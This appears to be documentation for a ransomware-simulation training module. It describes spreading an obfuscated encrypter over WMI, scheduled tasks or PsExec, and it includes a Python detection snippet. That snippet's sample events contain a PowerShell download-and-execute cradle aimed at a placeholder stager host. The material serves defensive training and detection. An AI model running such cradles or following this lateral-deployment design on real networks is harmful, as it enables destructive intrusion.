Description
This script simulates a ransomware attack by distributing an obfuscated encrypter via WMI, Scheduled Task, or PsExec.
Overview
This script distributes an obfuscated ransomware payload via WMI, Scheduled Task, or PsExec, trying each method in that order until one succeeds. The script can authenticate either by impersonation or with a username and password. For targeting, the script can either pull a list of domain computers from the Active Directory instance tied to the current user or take in a target list containing hostnames, IPs, or CIDR ranges. When using automatic targeting, the Specter implant must be running under a domain user account. Once a target list is built, the list is resolved to IP addresses. The local host's own IP addresses are removed from the list so that your foothold in the network is not impacted.
Next, the script performs a multithreaded port scan of each IP on port 445 to identify live hosts. Once that is complete, the script generates a new obfuscated ransomware payload and a PowerShell stager script. Both payloads are cached on the server. The live hosts are then passed to a multithreaded cmdlet that runs a PowerShell cradle on each live system; the cradle downloads the PowerShell stager script, which in turn loads the ransomware payload.
The ransomware payload looks for all files under C:\Users\ with specific extensions. It then encrypts each file and deletes the original. The decryption keys are stored alongside the encrypted files, so that a real threat actor could not use this script to ransom a target. This also gives students an opportunity to practice recovery using forensic malware analysis. Once encryption completes, the ransomware drops a ransom note application and creates a shortcut in the global startup folder. It then reboots the system. The next user to log on will see the ransom note.
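A defender-side check for the delivery chain described above, added here as an example that is not part of the script or of the Specter project: it flags process-creation events in which PowerShell carrying download-cradle syntax is spawned by the WMI provider host, the Task Scheduler service host or the PsExec service, and file-create events that drop a .lnk into the all-users startup folder. The Sysmon-style field names and the sample events are constructed for this example.

```python
import re
# Process images through which each delivery method named above runs its command
LATERAL_PARENTS = {
    "wmiprvse.exe": "WMI",
    "psexesvc.exe": "PsExec",
    "svchost.exe": "Scheduled Task",  # Schedule service host (also parents other services)
    "taskeng.exe": "Scheduled Task",  # task engine on older Windows
}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Command-line fragments typical of a cradle that downloads and runs a stager
CRADLE = re.compile(
    r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b|"
    r"invoke-expression|\biex\b|-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I)
# All-users startup folder, where the simulated ransomware drops its shortcut
STARTUP_DIR = "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\"

def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()
def check_process(ev):
    """Finding if PowerShell with cradle syntax was spawned by a lateral-movement parent."""
    if _basename(ev["Image"]) not in POWERSHELL:
        return None
    method = LATERAL_PARENTS.get(_basename(ev["ParentImage"]))
    if method is None or not CRADLE.search(ev["CommandLine"]):
        return None
    return {"host": ev["Computer"], "type": "cradle", "method": method}

def check_file(ev):
    """Finding if a .lnk was written to the all-users startup folder."""
    target = ev["TargetFilename"].lower()
    if target.startswith(STARTUP_DIR) and target.endswith(".lnk"):
        return {"host": ev["Computer"], "type": "startup-shortcut", "path": ev["TargetFilename"]}
    return None

def scan(events):
    """File-create events (TargetFilename present) get check_file, the rest check_process."""
    found = [check_file(ev) if "TargetFilename" in ev else check_process(ev) for ev in events]
    return [f for f in found if f]
# Constructed sample events with Sysmon-style field names, not real telemetry
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE = [
    {"Computer": "WKS1", "Image": PS, "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://stager.example/stager.ps1')\""},
    {"Computer": "WKS2", "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -File C:\\Scripts\\inventory.ps1"},
    {"Computer": "WKS1", "Image": PS,
     "TargetFilename": r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ransom.lnk"},
]
```

Running `scan(SAMPLE)` yields one cradle finding attributed to WMI and one startup-shortcut finding for WKS1; the svchost.exe parent will need tuning against legitimate scheduled administrative scripts.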
Arguments
- Targets: An array of comma-separated hostnames, IP addresses, or CIDR network ranges (e.g. WKS1.FOO.COM, 192.168.1.7, 10.0.0.0/24)
- Username: The username of the account to use for authentication.
- Password: The password for the user account.
Dependencies
- recon
- lateral
Operating Systems
- Windows
Pre-Requisites
- Valid administrator credentials for the target system(s) or domain.
Example Output
ComputerName ScheduledTask Success
------------ ------------- -------
192.168.1.2 @{Success=True; Message=Success!} True
192.168.1.103 @{Success=True; Message=Success!} True
